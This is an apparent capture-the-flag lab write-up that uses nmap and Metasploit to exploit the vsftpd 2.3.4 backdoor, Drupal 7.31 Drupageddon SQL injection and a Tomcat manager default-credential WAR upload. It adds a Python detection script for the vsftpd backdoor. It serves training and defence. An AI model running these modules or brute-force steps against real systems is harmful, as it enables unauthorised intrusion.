SUCSS CTF Writeup

Hacking 2

Published: 18 Feb 2026 • Difficulty: Medium

metasploit nmap http ftp ssh

Hacking 2 is a medium-difficulty CTF focused on practical exploitation and the application of known vulnerabilities. The walkthrough uses tools such as Metasploit and nmap to compromise targets across several stages.

  • vsftpd 2.3.4: Exploiting the documented backdoor.
  • Drupal 7.31: Leveraging the Drupageddon SQL injection (CVE-2014-3704).
  • Apache Tomcat 8.5.38: Exploiting the manager interface via unauthorized file uploads.

Certain services, including Nagios NSCA and SSH, are currently designated as work-in-progress and may not be fully exploitable in the current iteration.

Easy Level

$ nmap -sV 10.83.5.0/24

Key Findings:

IP          Port  Service      Version
10.83.5.6   2121  FTP          vsftpd 2.3.4
10.83.5.9   8080  nagios-nsca  Nagios NSCA
10.83.5.37  80    HTTP         Apache httpd 2.4.66 ((Debian))

Target 10.83.5.6 (Port 2121)

$ nmap -sV -sC -p 2121 10.83.5.6

PORT     STATE SERVICE VERSION
2121/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

The Vulnerability: The scan reveals vsftpd 2.3.4, a release known to have been distributed with a malicious backdoor in 2011. If a user attempts to log in with a username ending in a smiley face :), the backdoor triggers and opens a listening shell on port 6200.

We can easily exploit this using Metasploit, which automates the process of triggering the backdoor and catching the shell.

$ msfconsole
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(...) > exploit

Once the session opens, grab the flag.

$ cat flag.txt
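
A detection-side view of the backdoor behaviour described for this target, as an added example that is not part of the original writeup: it correlates FTP logins whose username contains :) with follow-up connections to port 6200. The normalized log format, the sample lines and the function name find_backdoor_activity are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

BACKDOOR_PORT = 6200  # port the writeup says the backdoor shell listens on
FTP_RE = re.compile(r'^(\S+) ftp client=(\S+) cmd="USER (.*)"$')
CONN_RE = re.compile(r'^(\S+) conn src=(\S+) dst=(\S+) dport=(\d+)$')

# Constructed sample in an assumed, normalized log format (not real CTF logs).
SAMPLE_LOG = """\
2026-02-18T10:00:01 ftp client=10.83.5.50 cmd="USER anonymous"
2026-02-18T10:00:07 ftp client=10.83.5.77 cmd="USER backup:)"
2026-02-18T10:00:09 conn src=10.83.5.77 dst=10.83.5.6 dport=6200
2026-02-18T10:05:00 ftp client=10.83.5.51 cmd="USER alice"
2026-02-18T10:30:00 conn src=10.83.5.52 dst=10.83.5.6 dport=6200
"""

def find_backdoor_activity(log_text, window=timedelta(seconds=60)):
    """Return trigger attempts and port-6200 contacts, correlated per client."""
    triggers, findings = [], []
    for line in log_text.splitlines():
        if m := FTP_RE.match(line):
            ts, client, user = m.groups()
            # ":)" anywhere in the name is a superset of "ending in :)".
            if ":)" in user:
                hit = {"client": client, "user": user,
                       "time": datetime.fromisoformat(ts), "shell_seen": False}
                triggers.append(hit)
                findings.append(hit)
        elif m := CONN_RE.match(line):
            ts, src, _dst, dport = m.groups()
            if int(dport) != BACKDOOR_PORT:
                continue
            when = datetime.fromisoformat(ts)
            match = next((t for t in triggers if t["client"] == src
                          and timedelta(0) <= when - t["time"] <= window), None)
            if match:
                match["shell_seen"] = True  # trigger followed by shell connection
            else:
                # Port 6200 contact with no logged trigger: still worth review.
                findings.append({"client": src, "user": None,
                                 "time": when, "shell_seen": True})
    return findings

if __name__ == "__main__":
    for finding in find_backdoor_activity(SAMPLE_LOG):
        print(finding)
```

A finding with both a user and shell_seen set to True is the highest-confidence signal; blocking inbound 6200 at the host firewall and replacing the 2.3.4 build removes the exposure entirely.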

Target 10.83.5.9 (Port 8080)

$ nmap -sV -sC -p 8080 10.83.5.9

PORT     STATE SERVICE     VERSION
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).

Status: This is currently a work-in-progress. Check back soon for the full solution!

Target 10.83.5.37 (Port 80)

$ nmap -sV -sC -p 80 10.83.5.37

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.66 ((Debian))
|_http-title: Welcome to Drupal731 | Drupal731
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.4.66 (Debian)

The Vulnerability: The HTTP title suggests Drupal 7.31. This version is highly vulnerable to CVE-2014-3704, famously known as 'Drupageddon.' It is a severe SQL injection vulnerability in the database abstraction API that allows unauthenticated attackers to execute arbitrary code.

Metasploit has a built-in module to handle the Drupageddon SQLi-to-RCE chain.

$ msfconsole
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(...) > exploit

Once the session opens, grab the flag.

$ cat flag.txt

Medium Level

$ nmap -sV 10.83.6.0/24

Key Findings:

IP         Port  Service  Version
10.83.6.7  8009  AJP13    Apache Jserv (Protocol v1.3)
10.83.6.7  8080  HTTP     Apache Tomcat 8.5.38
10.83.6.9  22    SSH      OpenSSH 9.6p1 (Protocol 2.0)

Target 10.83.6.7 (Port 8080)

$ nmap -sV -sC -p 8080 10.83.6.7

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat 8.5.38
|_http-title: Apache Tomcat/8.5.38

The Vulnerability: The HTTP title indicates Apache Tomcat 8.5.38. This installation is highly vulnerable to malicious .war files, which are automatically executed upon upload via the exposed /manager interface.

We will use a two-step approach in Metasploit: first to find the credentials, and second to upload our payload.

To find the credentials: use the auxiliary scanner to brute-force the Tomcat manager login.

$ msfconsole
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(...) > run

The scanner successfully outputs the default credentials manager:manager.

To upload the payload: switch to the exploit module to upload the malicious WAR file using the discovered credentials.

$ msfconsole
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(...) > exploit

Once the session opens, grab the flag.

$ cat flag.txt

Target 10.83.6.9 (Port 22)

Status: This is currently a work-in-progress. Check back soon for the full solution!